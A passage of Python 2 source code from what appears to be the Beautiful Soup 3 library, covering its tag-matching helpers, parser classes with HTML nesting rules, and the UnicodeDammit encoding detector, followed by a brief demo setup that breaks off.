elif isinstance(markup, NavigableString) or \ isString(markup): if self._matches(markup, self.text): found = markup else: raise Exception, "I don't know how to match against a %s" \ % markup.__class__ return found def _matches(self, markup, matchAgainst): #print "Matching %s against %s" % (markup, matchAgainst) result = False if matchAgainst == True and type(matchAgainst) == types.BooleanType: result = markup != None elif callable(matchAgainst): result = matchAgainst(markup) else: #Custom match methods take the tag as an argument, but all #other ways of matching match the tag name as a string. if isinstance(markup, Tag): markup = markup.name if markup and not isString(markup): markup = unicode(markup) #Now we know that chunk is either a string, or None. if hasattr(matchAgainst, 'match'): # It's a regexp object. result = markup and matchAgainst.search(markup) elif isList(matchAgainst): result = markup in matchAgainst elif hasattr(matchAgainst, 'items'): result = markup.has_key(matchAgainst) elif matchAgainst and isString(markup): if isinstance(markup, unicode): matchAgainst = unicode(matchAgainst) else: matchAgainst = str(matchAgainst) if not result: result = matchAgainst == markup return result class ResultSet(list): """A ResultSet is just a list that keeps track of the SoupStrainer that created it.""" def __init__(self, source): list.__init__([]) self.source = source # Now, some helper functions. def isList(l): """Convenience method that works with all 2.x versions of Python to determine whether or not something is listlike.""" return hasattr(l, '__iter__') \ or (type(l) in (types.ListType, types.TupleType)) def isString(s): """Convenience method that works with all 2.x versions of Python to determine whether or not something is stringlike.""" try: return isinstance(s, unicode) or isinstance(s, basestring) except NameError: return isinstance(s, str) def buildTagMap(default, *args): """Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.""" built = {} for portion in args: if hasattr(portion, 'items'): #It's a map. Merge it. for k,v in portion.items(): built[k] = v elif isList(portion): #It's a list. Map each item to the default. for k in portion: built[k] = default else: #It's a scalar. Map it to the default. built[portion] = default return built # Now, the parser classes. class BeautifulStoneSoup(Tag, SGMLParser): """This class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.""" SELF_CLOSING_TAGS = {} NESTABLE_TAGS = {} RESET_NESTING_TAGS = {} QUOTE_TAGS = {} PRESERVE_WHITESPACE_TAGS = [] MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), lambda x: x.group(1) + ' />'), (re.compile('<!\s+([^<>]*)>'), lambda x: '<!' 
+ x.group(1) + '>') ] ROOT_TAG_NAME = u'[document]' HTML_ENTITIES = "html" XML_ENTITIES = "xml" XHTML_ENTITIES = "xhtml" # TODO: This only exists for backwards-compatibility ALL_ENTITIES = XHTML_ENTITIES # Used when determining whether a text node is all whitespace and # can be replaced with a single space. A text node that contains # fancy Unicode spaces (usually non-breaking) should be left # alone. STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, markupMassage=True, smartQuotesTo=XML_ENTITIES, convertEntities=None, selfClosingTags=None, isHTML=False): """The Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.""" self.parseOnlyThese = parseOnlyThese self.fromEncoding = fromEncoding self.smartQuotesTo = smartQuotesTo self.convertEntities = convertEntities # Set the rules for how we'll deal with the entities we # encounter if self.convertEntities: # It doesn't make sense to convert encoded characters to # entities even while you're converting entities to Unicode. # Just convert it all to Unicode. self.smartQuotesTo = None if convertEntities == self.HTML_ENTITIES: self.convertXMLEntities = False self.convertHTMLEntities = True self.escapeUnrecognizedEntities = True elif convertEntities == self.XHTML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = True self.escapeUnrecognizedEntities = False elif convertEntities == self.XML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False else: self.convertXMLEntities = False self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) SGMLParser.__init__(self) if hasattr(markup, 'read'): # It's a file-type object. markup = markup.read() self.markup = markup self.markupMassage = markupMassage try: self._feed(isHTML=isHTML) except StopParsing: pass self.markup = None # The markup can now be GCed def convert_charref(self, name): """This method fixes a bug in Python's SGMLParser.""" try: n = int(name) except ValueError: return if not 0 <= n <= 127 : # ASCII ends at 127, not 255 return return self.convert_codepoint(n) def _feed(self, inDocumentEncoding=None, isHTML=False): # Convert the document to Unicode. 
markup = self.markup if isinstance(markup, unicode): if not hasattr(self, 'originalEncoding'): self.originalEncoding = None else: dammit = UnicodeDammit\ (markup, [self.fromEncoding, inDocumentEncoding], smartQuotesTo=self.smartQuotesTo, isHTML=isHTML) markup = dammit.unicode self.originalEncoding = dammit.originalEncoding self.declaredHTMLEncoding = dammit.declaredHTMLEncoding if markup: if self.markupMassage: if not isList(self.markupMassage): self.markupMassage = self.MARKUP_MASSAGE for fix, m in self.markupMassage: markup = fix.sub(m, markup) # TODO: We get rid of markupMassage so that the # soup object can be deepcopied later on. Some # Python installations can't copy regexes. If anyone # was relying on the existence of markupMassage, this # might cause problems. del(self.markupMassage) self.reset() SGMLParser.feed(self, markup) # Close out any unfinished strings and close all the open tags. self.endData() while self.currentTag.name != self.ROOT_TAG_NAME: self.popTag() def __getattr__(self, methodName): """This method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.""" #print "__getattr__ called on %s.%s" % (self.__class__, methodName) if methodName.find('start_') == 0 or methodName.find('end_') == 0 \ or methodName.find('do_') == 0: return SGMLParser.__getattr__(self, methodName) elif methodName.find('__') != 0: return Tag.__getattr__(self, methodName) else: raise AttributeError def isSelfClosingTag(self, name): """Returns true iff the given string is the name of a self-closing tag according to this parser.""" return self.SELF_CLOSING_TAGS.has_key(name) \ or self.instanceSelfClosingTags.has_key(name) def reset(self): Tag.__init__(self, self, self.ROOT_TAG_NAME) self.hidden = 1 SGMLParser.reset(self) self.currentData = [] self.currentTag = None self.tagStack = [] self.quoteStack = [] self.pushTag(self) def popTag(self): tag = self.tagStack.pop() # Tags with just one string-owning child get the child as a # 'string' property, so that soup.tag.string is shorthand for # soup.tag.contents[0] if len(self.currentTag.contents) == 1 and \ isinstance(self.currentTag.contents[0], NavigableString): self.currentTag.string = self.currentTag.contents[0] #print "Pop", tag.name if self.tagStack: self.currentTag = self.tagStack[-1] return self.currentTag def pushTag(self, tag): #print "Push", tag.name if self.currentTag: self.currentTag.contents.append(tag) self.tagStack.append(tag) self.currentTag = self.tagStack[-1] def endData(self, containerClass=NavigableString): if self.currentData: currentData = u''.join(self.currentData) if (currentData.translate(self.STRIP_ASCII_SPACES) == '' and not set([tag.name for tag in self.tagStack]).intersection( self.PRESERVE_WHITESPACE_TAGS)): if '\n' in currentData: currentData = '\n' else: currentData = ' ' self.currentData = [] if self.parseOnlyThese and len(self.tagStack) <= 1 and \ (not self.parseOnlyThese.text or \ not self.parseOnlyThese.search(currentData)): return o = containerClass(currentData) o.setup(self.currentTag, self.previous) if self.previous: self.previous.next = o self.previous = o self.currentTag.contents.append(o) def _popToTag(self, name, inclusivePop=True): """Pops the tag stack up to and including the most recent instance of the given tag. 
If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.""" #print "Popping to %s" % name if name == self.ROOT_TAG_NAME: return numPops = 0 mostRecentTag = None for i in range(len(self.tagStack)-1, 0, -1): if name == self.tagStack[i].name: numPops = len(self.tagStack)-i break if not inclusivePop: numPops = numPops - 1 for i in range(0, numPops): mostRecentTag = self.popTag() return mostRecentTag def _smartPop(self, name): """We need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' """ nestingResetTriggers = self.NESTABLE_TAGS.get(name) isNestable = nestingResetTriggers != None isResetNesting = self.RESET_NESTING_TAGS.has_key(name) popTo = None inclusive = True for i in range(len(self.tagStack)-1, 0, -1): p = self.tagStack[i] if (not p or p.name == name) and not isNestable: #Non-nestable tags get popped to the top or to their #last occurance. popTo = name break if (nestingResetTriggers != None and p.name in nestingResetTriggers) \ or (nestingResetTriggers == None and isResetNesting and self.RESET_NESTING_TAGS.has_key(p.name)): #If we encounter one of the nesting reset triggers #peculiar to this tag, or we encounter another tag #that causes nesting to reset, pop up to but not #including that tag. popTo = p.name inclusive = False break p = p.parent if popTo: self._popToTag(popTo, inclusive) def unknown_starttag(self, name, attrs, selfClosing=0): #print "Start tag %s: %s" % (name, attrs) if self.quoteStack: #This is not a real tag. #print "<%s> is not real!" % name attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs)) self.handle_data('<%s%s>' % (name, attrs)) return self.endData() if not self.isSelfClosingTag(name) and not selfClosing: self._smartPop(name) if self.parseOnlyThese and len(self.tagStack) <= 1 \ and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): return tag = Tag(self, name, attrs, self.currentTag, self.previous) if self.previous: self.previous.next = tag self.previous = tag self.pushTag(tag) if selfClosing or self.isSelfClosingTag(name): self.popTag() if name in self.QUOTE_TAGS: #print "Beginning quote (%s)" % name self.quoteStack.append(name) self.literal = 1 return tag def unknown_endtag(self, name): #print "End tag %s" % name if self.quoteStack and self.quoteStack[-1] != name: #This is not a real end tag. #print "</%s> is not real!" 
% name self.handle_data('</%s>' % name) return self.endData() self._popToTag(name) if self.quoteStack and self.quoteStack[-1] == name: self.quoteStack.pop() self.literal = (len(self.quoteStack) > 0) def handle_data(self, data): self.currentData.append(data) def _toStringSubclass(self, text, subclass): """Adds a certain piece of text to the tree as a NavigableString subclass.""" self.endData() self.handle_data(text) self.endData(subclass) def handle_pi(self, text): """Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.""" if text[:3] == "xml": text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" self._toStringSubclass(text, ProcessingInstruction) def handle_comment(self, text): "Handle comments as Comment objects." self._toStringSubclass(text, Comment) def handle_charref(self, ref): "Handle character references as data." if self.convertEntities: data = unichr(int(ref)) else: data = '&#%s;' % ref self.handle_data(data) def handle_entityref(self, ref): """Handle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.""" data = None if self.convertHTMLEntities: try: data = unichr(name2codepoint[ref]) except KeyError: pass if not data and self.convertXMLEntities: data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) if not data and self.convertHTMLEntities and \ not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): # TODO: We've got a problem here. We're told this is # an entity reference, but it's not an XML entity # reference or an HTML entity reference. Nonetheless, # the logical thing to do is to pass it through as an # unrecognized entity reference. # # Except: when the input is "&carol;" this function # will be called with input "carol". When the input is # "AT&T", this function will be called with input # "T". We have no way of knowing whether a semicolon # was present originally, so we don't know whether # this is an unknown entity or just a misplaced # ampersand. # # The more common case is a misplaced ampersand, so I # escape the ampersand and omit the trailing semicolon. data = "&amp;%s" % ref if not data: # This case is different from the one above, because we # haven't already gone through a supposedly comprehensive # mapping of entities to Unicode characters. We might not # have gone through any mapping at all. So the chances are # very high that this is a real entity, and not a # misplaced ampersand. data = "&%s;" % ref self.handle_data(data) def handle_decl(self, data): "Handle DOCTYPEs and the like as Declaration objects." self._toStringSubclass(data, Declaration) def parse_declaration(self, i): """Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.""" j = None if self.rawdata[i:i+9] == '<![CDATA[': k = self.rawdata.find(']]>', i) if k == -1: k = len(self.rawdata) data = self.rawdata[i+9:k] j = k+3 self._toStringSubclass(data, CData) else: try: j = SGMLParser.parse_declaration(self, i) except SGMLParseError: toHandle = self.rawdata[i:] self.handle_data(toHandle) j = i + len(toHandle) return j class BeautifulSoup(BeautifulStoneSoup): """This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. 
If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.""" def __init__(self, *args, **kwargs): if not kwargs.has_key('smartQuotesTo'): kwargs['smartQuotesTo'] = self.HTML_ENTITIES kwargs['isHTML'] = True BeautifulStoneSoup.__init__(self, *args, **kwargs) SELF_CLOSING_TAGS = buildTagMap(None, ['br' , 'hr', 'input', 'img', 'meta', 'spacer', 'link', 'frame', 'base']) PRESERVE_WHITESPACE_TAGS = set(['pre', 'textarea']) QUOTE_TAGS = {'script' : None, 'textarea' : None} #According to the HTML standard, each of these inline tags can #contain another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', 'center'] #According to the HTML standard, these block tags can contain #another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del'] #Lists can contain other lists, but there are restrictions. NESTABLE_LIST_TAGS = { 'ol' : [], 'ul' : [], 'li' : ['ul', 'ol'], 'dl' : [], 'dd' : ['dl'], 'dt' : ['dl'] } #Tables can contain other tables, but there are restrictions. NESTABLE_TABLE_TAGS = {'table' : [], 'tr' : ['table', 'tbody', 'tfoot', 'thead'], 'td' : ['tr'], 'th' : ['tr'], 'thead' : ['table'], 'tbody' : ['table'], 'tfoot' : ['table'], } NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre'] #If one of these tags is encountered, all tags up to the next tag of #this type are popped. 
RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', NON_NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) # Used to detect the charset in a META tag; see start_meta CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M) def start_meta(self, attrs): """Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.""" httpEquiv = None contentType = None contentTypeIndex = None tagNeedsEncodingSubstitution = False for i in range(0, len(attrs)): key, value = attrs[i] key = key.lower() if key == 'http-equiv': httpEquiv = value elif key == 'content': contentType = value contentTypeIndex = i if httpEquiv and contentType: # It's an interesting meta tag. match = self.CHARSET_RE.search(contentType) if match: if (self.declaredHTMLEncoding is not None or self.originalEncoding == self.fromEncoding): # An HTML encoding was sniffed while converting # the document to Unicode, or an HTML encoding was # sniffed during a previous pass through the # document, or an encoding was specified # explicitly and it worked. Rewrite the meta tag. def rewrite(match): return match.group(1) + "%SOUP-ENCODING%" newAttr = self.CHARSET_RE.sub(rewrite, contentType) attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], newAttr) tagNeedsEncodingSubstitution = True else: # This is our first pass through the document. # Go through it again with the encoding information. newCharset = match.group(3) if newCharset and newCharset != self.originalEncoding: self.declaredHTMLEncoding = newCharset self._feed(self.declaredHTMLEncoding) raise StopParsing pass tag = self.unknown_starttag("meta", attrs) if tag and tagNeedsEncodingSubstitution: tag.containsSubstitutions = True class StopParsing(Exception): pass class ICantBelieveItsBeautifulSoup(BeautifulSoup): """The BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. 
This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.""" I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', 'big'] I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript'] NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) class MinimalSoup(BeautifulSoup): """The MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.""" RESET_NESTING_TAGS = buildTagMap('noscript') NESTABLE_TAGS = {} class BeautifulSOAP(BeautifulStoneSoup): """This class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.""" def popTag(self): if len(self.tagStack) > 1: tag = self.tagStack[-1] parent = self.tagStack[-2] parent._getAttrMap() if (isinstance(tag, Tag) and len(tag.contents) == 1 and isinstance(tag.contents[0], NavigableString) and not parent.attrMap.has_key(tag.name)): parent[tag.name] = tag.contents[0] BeautifulStoneSoup.popTag(self) #Enterprise class names! It has come to our attention that some people #think the names of the Beautiful Soup parser classes are too silly #and "unprofessional" for use in enterprise screen-scraping. We feel #your pain! For such-minded folk, the Beautiful Soup Consortium And #All-Night Kosher Bakery recommends renaming this file to #"RobustParser.py" (or, in cases of extreme enterprisiness, #"RobustParserBeanInterface.class") and using the following #enterprise-friendly class aliases: class RobustXMLParser(BeautifulStoneSoup): pass class RobustHTMLParser(BeautifulSoup): pass class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup): pass class RobustInsanelyWackAssHTMLParser(MinimalSoup): pass class SimplifyingSOAPParser(BeautifulSOAP): pass ###################################################### # # Bonus library: Unicode, Dammit # # This class forces XML data into a standard format (usually to UTF-8 # or Unicode). It is heavily based on code from Mark Pilgrim's # Universal Feed Parser. It does not rewrite the XML or HTML to # reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi # (XML) and BeautifulSoup.start_meta (HTML). # Autodetects character encodings. # Download from http://chardet.feedparser.org/ try: import chardet # import chardet.constants # chardet.constants._debug = 1 except ImportError: chardet = None # cjkcodecs and iconv_codec make Python know about more character encodings. 
# Both are available from http://cjkpython.i18n.org/ # They're built in if you use Python 2.4. try: import cjkcodecs.aliases except ImportError: pass try: import iconv_codec except ImportError: pass class UnicodeDammit: """A class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.""" # This dictionary maps commonly seen values for "charset" in HTML # meta tags to the corresponding Python codec names. It only covers # values that aren't in Python's aliases and can't be determined # by the heuristics in find_codec. CHARSET_ALIASES = { "macintosh" : "mac-roman", "x-sjis" : "shift-jis" } def __init__(self, markup, overrideEncodings=[], smartQuotesTo='xml', isHTML=False): self.declaredHTMLEncoding = None self.markup, documentEncoding, sniffedEncoding = \ self._detectEncoding(markup, isHTML) self.smartQuotesTo = smartQuotesTo self.triedEncodings = [] if markup == '' or isinstance(markup, unicode): self.originalEncoding = None self.unicode = unicode(markup) return u = None for proposedEncoding in overrideEncodings: u = self._convertFrom(proposedEncoding) if u: break if not u: for proposedEncoding in (documentEncoding, sniffedEncoding): u = self._convertFrom(proposedEncoding) if u: break # If no luck and we have auto-detection library, try that: if not u and chardet and not isinstance(self.markup, unicode): u = self._convertFrom(chardet.detect(self.markup)['encoding']) # As a last resort, try utf-8 and windows-1252: if not u: for proposed_encoding in ("utf-8", "windows-1252"): u = self._convertFrom(proposed_encoding) if u: break self.unicode = u if not u: self.originalEncoding = None def _subMSChar(self, orig): """Changes a MS smart quote character to an XML or HTML entity.""" sub = self.MS_CHARS.get(orig) if type(sub) == types.TupleType: if self.smartQuotesTo == 'xml': sub = '&#x%s;' % sub[1] else: sub = '&%s;' % sub[0] return sub def _convertFrom(self, proposed): proposed = self.find_codec(proposed) if not proposed or proposed in self.triedEncodings: return None self.triedEncodings.append(proposed) markup = self.markup # Convert smart quotes to HTML if coming from an encoding # that might have them. if self.smartQuotesTo and proposed.lower() in("windows-1252", "iso-8859-1", "iso-8859-2"): markup = re.compile("([\x80-\x9f])").sub \ (lambda(x): self._subMSChar(x.group(1)), markup) try: # print "Trying to convert document to %s" % proposed u = self._toUnicode(markup, proposed) self.markup = u self.originalEncoding = proposed except Exception, e: # print "That didn't work!" # print e return None #print "Correct encoding: %s" % proposed return self.markup def _toUnicode(self, data, encoding): '''Given a string and its encoding, decodes the string into Unicode. 
%encoding is a string recognized by encodings.aliases''' # strip Byte Order Mark (if present) if (len(data) >= 4) and (data[:2] == '\xfe\xff') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16be' data = data[2:] elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16le' data = data[2:] elif data[:3] == '\xef\xbb\xbf': encoding = 'utf-8' data = data[3:] elif data[:4] == '\x00\x00\xfe\xff': encoding = 'utf-32be' data = data[4:] elif data[:4] == '\xff\xfe\x00\x00': encoding = 'utf-32le' data = data[4:] newdata = unicode(data, encoding) return newdata def _detectEncoding(self, xml_data, isHTML=False): """Given a document, tries to detect its XML encoding.""" xml_encoding = sniffed_xml_encoding = None try: if xml_data[:4] == '\x4c\x6f\xa7\x94': # EBCDIC xml_data = self._ebcdic_to_ascii(xml_data) elif xml_data[:4] == '\x00\x3c\x00\x3f': # UTF-16BE sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ and (xml_data[2:4] != '\x00\x00'): # UTF-16BE with BOM sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x3f\x00': # UTF-16LE sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ (xml_data[2:4] != '\x00\x00'): # UTF-16LE with BOM sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') elif xml_data[:4] == '\x00\x00\x00\x3c': # UTF-32BE sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x00\x00': # UTF-32LE sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') elif xml_data[:4] == '\x00\x00\xfe\xff': # UTF-32BE with BOM sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') elif xml_data[:4] == '\xff\xfe\x00\x00': # UTF-32LE with BOM sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') elif xml_data[:3] == '\xef\xbb\xbf': # UTF-8 with BOM sniffed_xml_encoding = 'utf-8' xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') else: sniffed_xml_encoding = 'ascii' pass except: xml_encoding_match = None xml_encoding_match = re.compile( '^<\?.*encoding=[\'"](.*?)[\'"].*\?>').match(xml_data) if not xml_encoding_match and isHTML: regexp = re.compile('<\s*meta[^>]+charset=([^>]*?)[;\'">]', re.I) xml_encoding_match = regexp.search(xml_data) if xml_encoding_match is not None: xml_encoding = xml_encoding_match.groups()[0].lower() if isHTML: self.declaredHTMLEncoding = xml_encoding if sniffed_xml_encoding and \ (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode', 'iso-10646-ucs-4', 'ucs-4', 'csucs4', 'utf-16', 'utf-32', 'utf_16', 'utf_32', 'utf16', 'u16')): xml_encoding = sniffed_xml_encoding return xml_data, xml_encoding, sniffed_xml_encoding def find_codec(self, charset): return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \ or (charset and self._codec(charset.replace("-", ""))) \ or (charset and self._codec(charset.replace("-", "_"))) \ or charset def _codec(self, charset): if not charset: return charset codec = None try: codecs.lookup(charset) codec = charset except (LookupError, ValueError): pass return codec EBCDIC_TO_ASCII_MAP = None def _ebcdic_to_ascii(self, s): c = self.__class__ if not c.EBCDIC_TO_ASCII_MAP: emap = 
(0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15, 16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31, 128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7, 144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26, 32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33, 38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94, 45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63, 186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34, 195,97,98,99,100,101,102,103,104,105,196,197,198,199,200, 201,202,106,107,108,109,110,111,112,113,114,203,204,205, 206,207,208,209,126,115,116,117,118,119,120,121,122,210, 211,212,213,214,215,216,217,218,219,220,221,222,223,224, 225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72, 73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81, 82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89, 90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57, 250,251,252,253,254,255) import string c.EBCDIC_TO_ASCII_MAP = string.maketrans( \ ''.join(map(chr, range(256))), ''.join(map(chr, emap))) return s.translate(c.EBCDIC_TO_ASCII_MAP) MS_CHARS = { '\x80' : ('euro', '20AC'), '\x81' : ' ', '\x82' : ('sbquo', '201A'), '\x83' : ('fnof', '192'), '\x84' : ('bdquo', '201E'), '\x85' : ('hellip', '2026'), '\x86' : ('dagger', '2020'), '\x87' : ('Dagger', '2021'), '\x88' : ('circ', '2C6'), '\x89' : ('permil', '2030'), '\x8A' : ('Scaron', '160'), '\x8B' : ('lsaquo', '2039'), '\x8C' : ('OElig', '152'), '\x8D' : '?', '\x8E' : ('#x17D', '17D'), '\x8F' : '?', '\x90' : '?', '\x91' : ('lsquo', '2018'), '\x92' : ('rsquo', '2019'), '\x93' : ('ldquo', '201C'), '\x94' : ('rdquo', '201D'), '\x95' : ('bull', '2022'), '\x96' : ('ndash', '2013'), '\x97' : ('mdash', '2014'), '\x98' : ('tilde', '2DC'), '\x99' : ('trade', '2122'), '\x9a' : ('scaron', '161'), '\x9b' : ('rsaquo', '203A'), '\x9c' : ('oelig', '153'), '\x9d' : '?', '\x9e' : ('#x17E', '17E'), '\x9f' : ('Yuml', ''),} ####################################################################### #By default, act as an HTML pretty-printer. if __name__ == '__main__': import sys soup = BeautifulSoup(sys.stdin) print soup.prettify()
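Editor's aside, not part of the recorded file: a minimal Python 2 sketch exercising the classes defined above. It assumes this record is saved as an importable BeautifulSoup.py; the nested-<b> fragment comes straight from the ICantBelieveItsBeautifulSoup docstring, and the commented outputs follow from the nesting maps shown above.

# Hypothetical demo -- assumes BeautifulSoup.py (the file above) is on sys.path.
from BeautifulSoup import BeautifulSoup, ICantBelieveItsBeautifulSoup, UnicodeDammit

fragment = '<b>Foo<b>Bar</b></b>'
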